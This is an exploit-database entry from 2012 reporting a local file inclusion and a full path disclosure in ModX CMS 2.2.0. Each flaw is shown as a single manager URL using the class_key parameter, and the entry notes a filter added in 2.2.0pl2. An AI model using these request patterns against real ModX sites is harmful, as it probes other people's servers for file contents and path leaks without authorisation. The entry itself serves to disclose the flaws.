ModX 2.2.0 Multiple Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ModX 2.2.0 Multiple Vulnerabilities
# Published : 2012-03-14
# Author :
# Previous Title : Zend Server 5.6.0 Multiple Remote Script Insertion Vulnerabilities
# Next Title : PlumeCMS <= 1.2.4 CSRF Vulnerability

# Exploit Title: Modx 2.2.0 LFI and Full Path Disclosure
# Google Dork: [if relevant]  (we will automatically add these to the GHDB)
# Date: 13/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://modx.com/download/
# Version: 2.2.0
# Tested on:  Windows XP/ Windows 7 / Ubuntu


+[-- LFI --]+

http://localhost/cms/manager/?a=55&class_key=

** Filter added in 2.2.0pl2 **


+[-- FPD --]+

http://localhost/cms/manager/?a=55&class_key=somefilethatdoesntexsist

+[-- Shoutz --]+

All the belegit crew..